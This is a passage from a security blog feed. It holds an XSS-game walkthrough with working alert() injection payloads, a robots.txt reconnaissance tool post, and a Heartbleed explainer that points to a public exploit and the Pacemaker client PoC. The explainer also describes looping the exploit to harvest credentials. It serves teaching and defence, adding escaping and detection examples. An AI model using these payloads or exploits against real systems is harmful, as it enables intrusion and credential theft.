<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjROsNGeU5thAWD8iXWJn-ivlwYsORd8lu4XI_faUEujdPB7zDK6GMWJaOg7kZwpmtE8xoI4sK1BqiTsT5ktHjBVVVqEfWSlde8LUVsOORixVxZuF0YtRLGMJncFN5EgiQH2VZutVLw9f0/s1600/XSS3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjROsNGeU5thAWD8iXWJn-ivlwYsORd8lu4XI_faUEujdPB7zDK6GMWJaOg7kZwpmtE8xoI4sK1BqiTsT5ktHjBVVVqEfWSlde8LUVsOORixVxZuF0YtRLGMJncFN5EgiQH2VZutVLw9f0/s1600/XSS3.png" height="368" width="640" /></a> ... we will see that "11111" has been added to the source code.
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5m3CQsBw1lUvoPfBQOIRTeshr57fkQ2jxfumBZueKgmdX1Ky0_1F3F6LITzfM2jTTYMol7qCMYO3x3dbwnkL4EKVMeeyA6kQ5LB7PQwhX905i3Ukq9Kzv345erXjh_Qq7C5cukr37XTw/s1600/XSS3_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5m3CQsBw1lUvoPfBQOIRTeshr57fkQ2jxfumBZueKgmdX1Ky0_1F3F6LITzfM2jTTYMol7qCMYO3x3dbwnkL4EKVMeeyA6kQ5LB7PQwhX905i3Ukq9Kzv345erXjh_Qq7C5cukr37XTw/s1600/XSS3_1.png" height="88" width="640" /></a></div>
<br />
So, if we add <span style="font-family: "Courier New",Courier,monospace;">#11111'onerror=alert('BehindTheFirewalls')> </span><span style="font-family: inherit;">at the end of the URL,</span> the code will be:<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;"><img src='/static/level3/cloud#11111'onerror=alert('BehindTheFirewalls')>'.jpg' /></span><br />
<br />
<span style="font-family: inherit;">And the alert will appear.</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2iW0IX9aFzMFreCuKjxC3syYLZAl7z1yckvib-nMQETz3V_SnUg2do9ciRlaMbqpecubnii8ju8EmUOomP3mrFRMvJJRoEgF6x7N4KpHAkYyP2lOjB5KGegNR9F0Oy988TFkdzNV4Zaw/s1600/XSS_3_2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2iW0IX9aFzMFreCuKjxC3syYLZAl7z1yckvib-nMQETz3V_SnUg2do9ciRlaMbqpecubnii8ju8EmUOomP3mrFRMvJJRoEgF6x7N4KpHAkYyP2lOjB5KGegNR9F0Oy988TFkdzNV4Zaw/s1600/XSS_3_2.png" height="322" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
These are the three possible ways to exploit this vulnerability.<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">/frame#1'onerror=alert('BehindTheFirewalls')></span><br />
<span style="font-family: "Courier New",Courier,monospace;"><br /></span>
<span style="font-family: "Courier New",Courier,monospace;">/frame#1.jpg'onload=alert('BehindTheFirewalls')></span><br />
<span style="font-family: "Courier New",Courier,monospace;"><br /></span>
<span style="font-family: "Courier New",Courier,monospace;">/frame#1jpg'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT></span><br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
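The three exercises differ only in where the untrusted string lands: in the page body (exercises 1 and 2) or inside the single-quoted <code>src</code> attribute of the image (exercise 3). The following added example, not code from the XSS game, renders each of the payloads used above with and without context-appropriate escaping and summarises the resulting markup with Python's own HTML parser, so you can see that after <code>html.escape(..., quote=True)</code> no <code>script</code> tag, <code>img</code> tag or <code>onerror</code> attribute survives. The text around the injected value is constructed for the example; the <code>cloud...jpg</code> image template follows the source line shown in the post.

```python
"""Exercises 1-3: the same payloads with and without context-aware escaping.

Added example for this post; not code from the XSS game. The page text around
the injected value is constructed; the image template for exercise 3 follows
the source line shown in the post.
"""
import html
from html.parser import HTMLParser

PAYLOAD_SCRIPT = "<script>alert('BehindTheFirewalls')</script>"     # exercise 1
PAYLOAD_IMG = "<img src=x onerror=alert('BehindTheFirewalls')>"      # exercise 2
PAYLOAD_ATTR = "11111'onerror=alert('BehindTheFirewalls')>"         # exercise 3


def render_text_vulnerable(value):
    """Untrusted string in HTML body context, unescaped (exercises 1 and 2)."""
    return f"<p>No results for <b>{value}</b></p>"


def render_text_safe(value):
    """html.escape turns < > & and both quote characters into entities."""
    return f"<p>No results for <b>{html.escape(value, quote=True)}</b></p>"


def render_img_vulnerable(num):
    """Untrusted string inside a single-quoted attribute, unescaped (exercise 3)."""
    return f"<img src='/static/level3/cloud{num}.jpg' />"


def render_img_safe(num):
    """quote=True matters here: ' becomes &#x27;, so the attribute cannot be closed."""
    return f"<img src='/static/level3/cloud{html.escape(num, quote=True)}.jpg' />"


class _Collector(HTMLParser):
    """Records which tags and attribute names the parser sees."""

    def __init__(self):
        super().__init__()
        self.tags, self.attrs = set(), set()

    def handle_starttag(self, tag, attrs):
        self.tags.add(tag)
        self.attrs.update(name for name, _ in attrs)


def markup_summary(markup):
    """Return (tag names, attribute names) found in `markup`, as sorted lists."""
    c = _Collector()
    c.feed(markup)
    c.close()
    return sorted(c.tags), sorted(c.attrs)


if __name__ == "__main__":
    for render, payload in ((render_text_vulnerable, PAYLOAD_SCRIPT),
                            (render_text_safe, PAYLOAD_SCRIPT),
                            (render_text_vulnerable, PAYLOAD_IMG),
                            (render_text_safe, PAYLOAD_IMG),
                            (render_img_vulnerable, PAYLOAD_ATTR),
                            (render_img_safe, PAYLOAD_ATTR)):
        print(render.__name__, markup_summary(render(payload)))
```

The attribute case is the one people get wrong: escaping only <code>&lt;</code> and <code>&gt;</code> would leave the <code>'</code> in the exercise 3 payload intact, and the quote, not the angle bracket, is what ends the <code>src</code> value and starts a new attribute.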
Javier Nietohttp://www.blogger.com/profile/05976836878834402718noreply@blogger.com2tag:blogger.com,1999:blog-3160485247929481680.post-2891217645119681912014-05-27T08:20:00.001-07:002014-05-28T00:13:54.493-07:00Parsero 0.75 is out!!!!<div style="text-align: justify;">
At the beginning of this month, <a href="http://www.toolswatch.org/2014/05/new-tool-parsero-v0-71-attacking-robots-txt-files-released/" target="_blank">Parsero v0.71 was presented by ToolsWatch Hacker Arsenal</a> in their blog. That is something that I really appreciate...</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Today, I would like to introduce Parsero v0.75. Before writing about that, let me make a brief summary.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<div style="text-align: justify;">
As written in the <a href="https://www.owasp.org/index.php/Testing:_Review_Webserver_Metafiles_for_Information_Leakage_%28OTG-INFO-003%29" target="_blank">OWASP Testing Guide v4: Testing: Review Webserver Metafiles for Information Leakage (OTG-INFO-003)</a>, the robots.txt file could be used "for information leakage of the web application's directory or folder path(s)".</div>
<div style="text-align: justify;">
<br /></div>
In order to obtain sensitive information thanks to this file, I've developed Parsero, which is able to perform this task automatically.<br />
<h2>
What is new?</h2>
Some problems have been fixed in the current version, which also has three new features that I would like to talk about.<br />
<br />
<ul>
<li>In the last version, Parsero was able to detect whether the content of the Disallow entries had been indexed by Bing by searching in that engine. Now we are also able to check whether these indexed links are actually available or not. Notice that Parsero only checks the links on the first Bing results page, which means the first 10 results are analyzed.</li>
</ul>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2MzQCcQ5CialJghgniK-LG87B260Ewn2PpMgQ3OG75YyuMvQSOrRElm-pDkCBp0iwfwn1BqZs2HYgLp7NuNO4RBTuNR29v2hEje86U8JAyRmZO8lppVQd5pv0d-JvDTxKePzlsLztbfk/s1600/Robots_4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2MzQCcQ5CialJghgniK-LG87B260Ewn2PpMgQ3OG75YyuMvQSOrRElm-pDkCBp0iwfwn1BqZs2HYgLp7NuNO4RBTuNR29v2hEje86U8JAyRmZO8lppVQd5pv0d-JvDTxKePzlsLztbfk/s1600/Robots_4.png" height="321" width="400" /></a> </div>
<br />
<ul>
<li>Now Parsero is able to detect repeated Disallow entries in the robots.txt file, so that each one is checked only once to save time. The picture below shows a robots.txt file with the same links repeated.</li>
</ul>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgA5zGNmedeUU6bJURsef9Y_CqQxDRW3OtGyyNCL-b-N0kh_8r3JoktOn3GlcdUvcBMe-lH2qTaGj7SE9TL_suKrIHOlvn7G5xvdIuw2fkKLKq2J8IBJPNHfNtxElWlHqODzoMscIWz3pE/s1600/Robots_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgA5zGNmedeUU6bJURsef9Y_CqQxDRW3OtGyyNCL-b-N0kh_8r3JoktOn3GlcdUvcBMe-lH2qTaGj7SE9TL_suKrIHOlvn7G5xvdIuw2fkKLKq2J8IBJPNHfNtxElWlHqODzoMscIWz3pE/s1600/Robots_1.png" /></a></div>
<br />
And this is how Parsero detects them and checks each Disallow entry only once.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQvFwIaxLPgv2vAF0a2xRJk4JTQ3NGMpj6B_N3RnRgM4QlH4Dajkjxbo7mC26qznCMMPO9qevdcmKJ04ENVrGL3F5F1DURiIWF-4W1Ofy1IxnAVggfK-aYvZMBZdAfbuBt76l0FQVI1P8/s1600/Robots_2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQvFwIaxLPgv2vAF0a2xRJk4JTQ3NGMpj6B_N3RnRgM4QlH4Dajkjxbo7mC26qznCMMPO9qevdcmKJ04ENVrGL3F5F1DURiIWF-4W1Ofy1IxnAVggfK-aYvZMBZdAfbuBt76l0FQVI1P8/s1600/Robots_2.png" height="260" width="400" /></a></div>
<br />
<ul>
<li>In the last version, Parsero downloaded the robots.txt file to the local machine in order to parse it. Now Parsero parses it on the fly, without writing it to disk.</li>
</ul>
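The two behaviours described above (collapsing repeated Disallow entries and checking each one exactly once) as an added example in plain Python; this is not Parsero's own code, and the robots.txt content, the example.com URLs and the status responses are constructed so it runs offline. The Bing lookup is left out; the real <code>http_status</code> fetcher can be swapped in for <code>fake_status</code>.

```python
from typing import Callable, Dict, List
from urllib.parse import urljoin
import urllib.error
import urllib.request

# Constructed robots.txt with repeated Disallow entries, the case the new
# Parsero release de-duplicates before checking each path.
SAMPLE_ROBOTS = """\
User-agent: *
Disallow: /admin/
Disallow: /backup/
Disallow: /admin/          # repeated on purpose
Disallow:                  # empty rule: allows everything, nothing to check
Disallow: /private/config.php
Allow: /public/
User-agent: Googlebot
Disallow: /backup/         # repeated under a second user-agent block
"""


def disallow_urls(robots_txt: str, base_url: str) -> List[str]:
    """Return each Disallow path as an absolute URL, first occurrence only."""
    seen = set()
    urls = []
    for raw in robots_txt.splitlines():
        line = raw.split("#", 1)[0].strip()          # drop comments
        if ":" not in line:
            continue
        field, value = (part.strip() for part in line.split(":", 1))
        if field.lower() != "disallow" or not value:
            continue
        url = urljoin(base_url, value)
        if url not in seen:                           # check each path once
            seen.add(url)
            urls.append(url)
    return urls


def http_status(url: str, timeout: float = 10.0) -> int:
    """Fetch the URL with a HEAD request and return the HTTP status code."""
    request = urllib.request.Request(url, method="HEAD")
    try:
        with urllib.request.urlopen(request, timeout=timeout) as response:
            return response.status
    except urllib.error.HTTPError as err:
        return err.code


def check_disallows(robots_txt: str, base_url: str,
                    fetch: Callable[[str], int] = http_status) -> Dict[str, str]:
    """Map each unique Disallow URL to 'available', 'forbidden' or 'missing'."""
    verdicts = {}
    for url in disallow_urls(robots_txt, base_url):
        code = fetch(url)
        if code == 200:
            verdicts[url] = "available"       # hidden from crawlers but reachable
        elif code in (401, 403):
            verdicts[url] = "forbidden"
        else:
            verdicts[url] = "missing"
    return verdicts


# Constructed responses so the example runs offline.
FAKE_RESPONSES = {
    "http://example.com/admin/": 200,
    "http://example.com/backup/": 403,
    "http://example.com/private/config.php": 404,
}


def fake_status(url: str) -> int:
    return FAKE_RESPONSES.get(url, 404)


if __name__ == "__main__":
    results = check_disallows(SAMPLE_ROBOTS, "http://example.com", fake_status)
    for url, verdict in results.items():
        print(f"{verdict:10} {url}")
```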
<br />
You can download Parsero here: <a href="https://github.com/behindthefirewalls/Parsero" target="_blank">https://github.com/behindthefirewalls/Parsero</a><br />
<br />
More info here: <a href="http://www.behindthefirewalls.com/search/label/Parsero" target="_blank">http://www.behindthefirewalls.com/search/label/Parsero</a><br />
<br /></div>
Javier Nietohttp://www.blogger.com/profile/05976836878834402718noreply@blogger.com0tag:blogger.com,1999:blog-3160485247929481680.post-30539095262961815302014-04-15T09:11:00.001-07:002014-04-15T09:11:35.648-07:00OpenSSL Heartbleed, what the hell has happened here?<div style="text-align: justify;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiK16HTgCPckBtO9REblPwdKpeGY_iRwjeSuJznDro7xCIcByHFrn63pCjHvkf6tyJln6x28V6kA1yQnbSgNjRlSeT1ZSrRflmZS0m5o8fQkOBHs9NmbSshCp4xc8oEZPVT_BrfLSgx584/s1600/heartbleed.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiK16HTgCPckBtO9REblPwdKpeGY_iRwjeSuJznDro7xCIcByHFrn63pCjHvkf6tyJln6x28V6kA1yQnbSgNjRlSeT1ZSrRflmZS0m5o8fQkOBHs9NmbSshCp4xc8oEZPVT_BrfLSgx584/s1600/heartbleed.png" height="200" width="165" /></a><span class="short_text" id="result_box" lang="en" tabindex="-1">Just one day before the <a href="http://www.behindthefirewalls.com/2014/04/microsoft-xp-has-died-but-millions-of.html" target="_blank">Windows XP </a></span><span class="short_text" id="result_box" lang="en" tabindex="-1"><a href="http://www.behindthefirewalls.com/2014/04/microsoft-xp-has-died-but-millions-of.html" target="_blank"><span class="short_text" id="result_box" lang="en" tabindex="-1">end of life</span></a>, the vulnerability identified as<span class="hps"> <a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0160" target="_blank">CVE-2014-0160</a> was published. A lot of blogs have talked about the OpenSSL vulnerability called "<u>Heartbleed Bug</u>". Many of us security administrators have spent the last few days focused on patching this security issue... I believe everything has already been said...</span></span><br />
<br />
<span class="short_text" id="result_box" lang="en" tabindex="-1"><span class="hps">In this post, I'd like to write a brief summary of what has happened around this really interesting and critical issue.</span></span><span class="short_text" id="result_box" lang="en" tabindex="-1"><span class="hps"> </span></span></div>
<div style="text-align: justify;">
<h3>
The BUG description</h3>
These are some of the sentences OpenSSL wrote about the <a href="https://www.openssl.org/news/secadv_20140407.txt" target="_blank">BUG</a> on their website.<br />
<br />
"A missing bounds check in the handling of the TLS heartbeat extension can be used to reveal up to 64k of memory to a connected client or server."<br />
<br />
"Affected users should upgrade to OpenSSL 1.0.1g. Users unable to immediately<br />
<div style="text-align: left;">
upgrade can alternatively recompile OpenSSL with -DOPENSSL_NO_HEARTBEATS."<br />
<br />
So... someone could steal information from our servers/clients thanks to this bug... </div>
<br />
<u>But... what is the heartbeat?</u><br />
<br />
This is what <a href="https://tools.ietf.org/html/rfc6520" target="_blank">RFC 6520</a> says about the heartbeat:<br />
<br />
"DTLS is designed to secure traffic running on top of unreliable transport protocols. Usually, such protocols have no session management. The only mechanism available at the DTLS layer to figure out if a peer is still alive is a costly renegotiation, particularly when the application uses unidirectional traffic. Furthermore, DTLS needs to perform path MTU (PMTU) discovery but has no specific message type to realize it without affecting the transfer of user messages."<br />
<br />
"TLS is based on reliable protocols, but there is not necessarily a feature available to keep the connection alive without continuous data transfer."<br />
<br />
"The Heartbeat Extension as described in this document overcomes these limitations. The user can use the new HeartbeatRequest message, which has to be answered by the peer with a HeartbeartResponse immediately. To perform PMTU discovery, HeartbeatRequest messages containing padding can be used as probe packets, as described in [<a href="https://tools.ietf.org/html/rfc4821" target="_blank">RFC4821</a>]."<br />
<br />
So, to avoid renegotiating the secure session continuously (which has a direct impact on server performance), Heartbeat was designed to say... "Hey!! Are you still there?? This session is not finished yet!!!"<br />
<br />
<u>How does the vulnerability work?</u><br />
<br />
As mentioned above, the security problem resides in the heartbeat. There are hundreds of explanations of this security problem... I've found the <a href="http://imgs.xkcd.com/comics/heartbleed_explanation.png" target="_blank">picture</a> below, which describes really well how this vulnerability is abused. <span class="short_text" id="result_box" lang="en" tabindex="-1"><span class="hps">It couldn't be explained better.</span></span><br />
<br />
<div style="text-align: center;">
<span style="color: red;">Click on the picture</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxIV1X1IkLq4hHh20M78-yKqac4T2XI7E5dM2SWNTVwDQxbbDaEqpXf2JuliA61reovQcJgKUwgY7tmy9gMH65WS99OHug_4U-9-eU5MvoZpe93dmJSmGmJrVFgUeNqvRKTNrF_oSEbOw/s1600/heartbleed_explanation.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxIV1X1IkLq4hHh20M78-yKqac4T2XI7E5dM2SWNTVwDQxbbDaEqpXf2JuliA61reovQcJgKUwgY7tmy9gMH65WS99OHug_4U-9-eU5MvoZpe93dmJSmGmJrVFgUeNqvRKTNrF_oSEbOw/s1600/heartbleed_explanation.png" height="640" width="300" /></a></div>
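The missing check in one place, as an added example that is not OpenSSL's code: a heartbeat message carries a 2-byte <code>payload_length</code>, and the vulnerable versions echoed that many bytes back without confirming the record actually contained them. The function below applies the bounds check the fixed version introduced (discard any request whose claimed payload plus 16 bytes of padding exceeds the record), which is also the condition an IDS rule for this bug tests. The TLS records are constructed samples.

```python
import os
import struct
from typing import Optional, Tuple

# TLS record content type for the Heartbeat Extension (RFC 6520, section 6).
TLS_HEARTBEAT = 24
HB_REQUEST, HB_RESPONSE = 1, 2
MIN_PADDING = 16        # RFC 6520: padding MUST be at least 16 bytes
MAX_PAYLOAD = 16384     # RFC 6520: payload_length MUST NOT exceed 2^14


def split_tls_record(data: bytes) -> Tuple[int, bytes]:
    """Return (content_type, fragment) for one TLS record; raise if truncated."""
    if len(data) < 5:
        raise ValueError("truncated TLS record header")
    content_type, _version, length = struct.unpack_from("!BHH", data, 0)
    fragment = data[5:5 + length]
    if len(fragment) != length:
        raise ValueError("record body shorter than the header claims")
    return content_type, fragment


def heartbeat_claims_too_much(fragment: bytes) -> bool:
    """True when the heartbeat's payload_length does not fit in the record.

    This is the bounds check the vulnerable OpenSSL versions lacked: the
    claimed payload (plus the mandatory 16 bytes of padding) must fit inside
    the bytes that actually arrived.
    """
    if len(fragment) < 3:
        return True
    payload_length = struct.unpack_from("!H", fragment, 1)[0]
    return 1 + 2 + payload_length + MIN_PADDING > len(fragment)


def heartbeat_response(fragment: bytes) -> Optional[bytes]:
    """Build a HeartbeatResponse the way the fixed code does.

    The vulnerable code copied payload_length bytes from the request buffer
    into the reply, so whatever followed a short request in memory was echoed
    back.  The fix silently discards any request that fails the check above;
    this function returns None in that case.
    """
    if heartbeat_claims_too_much(fragment) or fragment[0] != HB_REQUEST:
        return None
    payload_length = struct.unpack_from("!H", fragment, 1)[0]
    if payload_length > MAX_PAYLOAD:
        return None
    payload = fragment[3:3 + payload_length]
    return (bytes([HB_RESPONSE]) + struct.pack("!H", payload_length)
            + payload + os.urandom(MIN_PADDING))


def build_record(fragment: bytes) -> bytes:
    """Wrap a heartbeat fragment in a TLS 1.1 record header (constructed sample)."""
    return struct.pack("!BHH", TLS_HEARTBEAT, 0x0302, len(fragment)) + fragment


def classify(record: bytes) -> str:
    """Label one TLS record the way a detection rule would."""
    content_type, fragment = split_tls_record(record)
    if content_type != TLS_HEARTBEAT:
        return "not-heartbeat"
    return "malformed-heartbeat" if heartbeat_claims_too_much(fragment) else "heartbeat-ok"


# Constructed samples: a well-formed request, and one claiming 16 KB of payload
# while carrying only two bytes.
GOOD_REQUEST = bytes([HB_REQUEST]) + struct.pack("!H", 5) + b"hello" + b"\x00" * MIN_PADDING
BAD_REQUEST = bytes([HB_REQUEST]) + struct.pack("!H", 0x4000) + b"hi"

if __name__ == "__main__":
    for fragment in (GOOD_REQUEST, BAD_REQUEST):
        record = build_record(fragment)
        print(classify(record), heartbeat_response(fragment))
```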
<h3>
POC in the server side</h3>
So, are we really able to get 64 KB of memory from a remote server in an easy way? The answer is... YES!!!<br />
<br />
Just download the exploit from <a href="http://www.exploit-db.com/exploits/32764/" target="_blank">here</a>, execute it against a vulnerable server and you will see 64 KB of the server's memory. Sometimes we will get nothing interesting...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6uLgf37Km8NMyG4FXzCUmh8zKhBcDKNcLqbbMecSbG09mehyphenhyphenaeQVvpZYEAt4SawI6UtdGbbhn-Wb6hJFl3OdKcISdgdIZV7MdBnab2XkUuHjmFs-U0F9OzBRIali3HczL70K_HYqVJO8/s1600/dump1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6uLgf37Km8NMyG4FXzCUmh8zKhBcDKNcLqbbMecSbG09mehyphenhyphenaeQVvpZYEAt4SawI6UtdGbbhn-Wb6hJFl3OdKcISdgdIZV7MdBnab2XkUuHjmFs-U0F9OzBRIali3HczL70K_HYqVJO8/s1600/dump1.png" height="120" width="400" /></a></div>
<br />
... and sometimes we will get usernames and passwords in clear text, as you can see in the picture below. This image came from someone who detected that login.yahoo.com was vulnerable to this bug.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWpITqmC52MypDlWSPYhfPeitSsT-q-SGGTa5juc1DhIg0a4tfrczM1hk7sHa-SWs6KYTYcoUvwNTMA7i1gMLfB94J_bcPUZ6JuU_8HxpsqYbVA_tfzDTv4zshynyM3A8Ky9k5mPNkt4k/s1600/Yahoo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWpITqmC52MypDlWSPYhfPeitSsT-q-SGGTa5juc1DhIg0a4tfrczM1hk7sHa-SWs6KYTYcoUvwNTMA7i1gMLfB94J_bcPUZ6JuU_8HxpsqYbVA_tfzDTv4zshynyM3A8Ky9k5mPNkt4k/s1600/Yahoo.png" height="323" width="640" /></a></div>
<br />
I've been testing my vulnerable servers by executing the exploit in a loop every second, and I was able to get a lot of usernames and passwords and really interesting information from these vulnerable servers.<br />
<br />
Did you think 64 KB of RAM wasn't enough to steal valuable information?<br />
<h3>
POC in the client side</h3>
So, are we really able to get 64 KB of memory from a remote client in an easy way? The answer is... YES!!!<br />
<br />
<a href="https://github.com/Lekensteyn/pacemaker" target="_blank">Pacemaker</a> is a script written in Python that attempts to abuse OpenSSL clients vulnerable to Heartbleed (CVE-2014-0160). When pacemaker.py is executed, it starts listening on port 4433/TCP by default. To test whether a client is vulnerable, just connect to this port. If it is vulnerable, you will see a 64 KB memory dump from your client, as in the picture below.<br />
<br />
Example: wget -O /dev/null https://google.com https://localhost:4433<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg16RihhQohdJ7_U5hVMloP6XOY4TRZMVxhMCsb3gQoKK_ZycQ3MHzPExgc25bwf0HiiQY6vecdph4YwjWuvI6AGPMca-SI-Q7n1a0fnOG9d5BDO6fYvwtdwLlD863Vg94mtXo2kNOubwk/s1600/Server1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg16RihhQohdJ7_U5hVMloP6XOY4TRZMVxhMCsb3gQoKK_ZycQ3MHzPExgc25bwf0HiiQY6vecdph4YwjWuvI6AGPMca-SI-Q7n1a0fnOG9d5BDO6fYvwtdwLlD863Vg94mtXo2kNOubwk/s1600/Server1.png" height="204" width="400" /></a></div>
<br />
If the client is not vulnerable, the tool will print something like you can see in this image.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-8k1LigiTemTLoRzdIFPzHUTY8HoW1QI1ZRn0_4WXQDhXveiLY-1wL2Le5FT7f04Yj-FxzJMBYf2MkOA9TjXCgLPugZt3EAQhepSA3e7PMetLW7BqpeTRxZxGCMzVnqT4qdUJnQoGcEs/s1600/Server2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-8k1LigiTemTLoRzdIFPzHUTY8HoW1QI1ZRn0_4WXQDhXveiLY-1wL2Le5FT7f04Yj-FxzJMBYf2MkOA9TjXCgLPugZt3EAQhepSA3e7PMetLW7BqpeTRxZxGCMzVnqT4qdUJnQoGcEs/s1600/Server2.png" height="120" width="400" /></a></div>
<h3>
Affected versions</h3>
<u>Servers</u><br />
<br />
Any server using OpenSSL 1.0.1 through 1.0.1f (inclusive) is vulnerable.<br />
<br />
These versions are not vulnerable:<br />
<ul>
<li>OpenSSL 1.0.1g</li>
<li>OpenSSL 1.0.0 branch</li>
<li>OpenSSL 0.9.8 branch</li>
</ul>
<br />
<div style="text-align: left;">
Be aware of appliances which have OpenSSL installed, like SSL-VPN devices, firewalls, etc... They could be vulnerable too. <a href="http://www.kb.cert.org/vuls/byvendor?searchview&Query=FIELD+Reference=720951&SearchOrder=4" target="_blank">Here</a> you can get more info about some of them.</div>
<br />
<u>Clients</u><br />
<br />
The list below shows some vulnerable clients tested with Pacemaker. <br />
<ul>
<li>MariaDB 5.5.36</li>
<li>wget 1.15 (leaks memory of earlier connections and own state)</li>
<li>curl 7.36.0 (https, FTP/IMAP/POP3/SMTP with --ftp-ssl)</li>
<li>git 1.9.1 (tested clone / push, leaks not much)</li>
<li>nginx 1.4.7 (in proxy mode, leaks memory of previous requests)</li>
<li>links 2.8 (leaks contents of previous visits!)</li>
<li>KDE 4.12.4 (kioclient, Dolphin, tested https and ftps with kde4-ftps-kio)</li>
<li>Exim 4.82 (outgoing SMTP)</li>
</ul>
<h3>
<span class="short_text" id="result_box" lang="en" tabindex="-1"><span class="hps">What</span> should I do<span class="hps">?</span></span></h3>
<ol>
<li>Detect all your vulnerable servers.</li>
<li>Upgrade your OpenSSL to version 1.0.1g.</li>
<li>Your private keys could have been stolen. Acquire new keys and certificates, revoke your old ones and install the new ones.</li>
<li>Your users' passwords could have been stolen. Force them to change them.</li>
<li>Inform your customers if you have been vulnerable.</li>
<li>Beware of the inevitable phishing campaigns.</li>
<li>Deploy signatures in your IDS/IPS to detect how many times you are being attacked.</li>
<li>Detect if you have been compromised.</li>
</ol>
</div>
<h3>
The OpenSSL Bug timeline</h3>
<u>04/07/2014 17:30 UTC</u> OpenSSL published the security advisory <a href="https://www.openssl.org/news/secadv_20140407.txt" target="_blank">here</a>.<br />
<br />
<div style="text-align: justify;">
<u>04/07/2014 18:00 UTC</u> The website "<a href="http://heartbleed.com/" target="_blank">Heartbleed.com</a>" was published.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<u>04/07/2014 19:00 UTC</u> OpenSSL released a <a href="http://www.openssl.org/source/" target="_blank">new version "openssl-1.0.1g"</a>.<br />
<br />
<u>04/08/2014</u> <a class="jive-link-external-small" href="https://twitter.com/FiloSottile">Filippo Valsorda</a> published an open source <a class="jive-link-external-small" href="http://filippo.io/Heartbleed/">Heartbleed test</a>.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<u>04/09/2014</u> The exploit "<a href="http://www.exploit-db.com/exploits/32764/" target="_blank">OpenSSL TLS Heartbeat Extension - Memory Disclosure - Multiple SSL/TLS versions</a>" was published.<br />
<br />
<u>04/09/2014</u> The module for <a href="https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb" target="_blank">Metasploit</a> appeared.<br />
<br />
<u>04/09/2014</u> A script for <a href="https://svn.nmap.org/nmap/scripts/ssl-heartbleed.nse" target="_blank">Nmap</a> was released.<br />
<br />
<u>04/09/2014</u> A stable version of <a href="https://github.com/Lekensteyn/pacemaker" target="_blank">Pacemaker</a> was published.<br />
<br />
<u>04/10/2014</u> The website <a href="http://reverseheartbleed.com/" target="_blank">reverseheartbleed.com</a> was created.</div>
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
<br />
<br />
<br /></div>
Javier Nietohttp://www.blogger.com/profile/05976836878834402718noreply@blogger.com0tag:blogger.com,1999:blog-3160485247929481680.post-14750676062010767482014-04-14T00:15:00.000-07:002014-04-14T00:15:27.683-07:00Why you shouldn't open files directly from a ZIP file<div style="text-align: justify;">
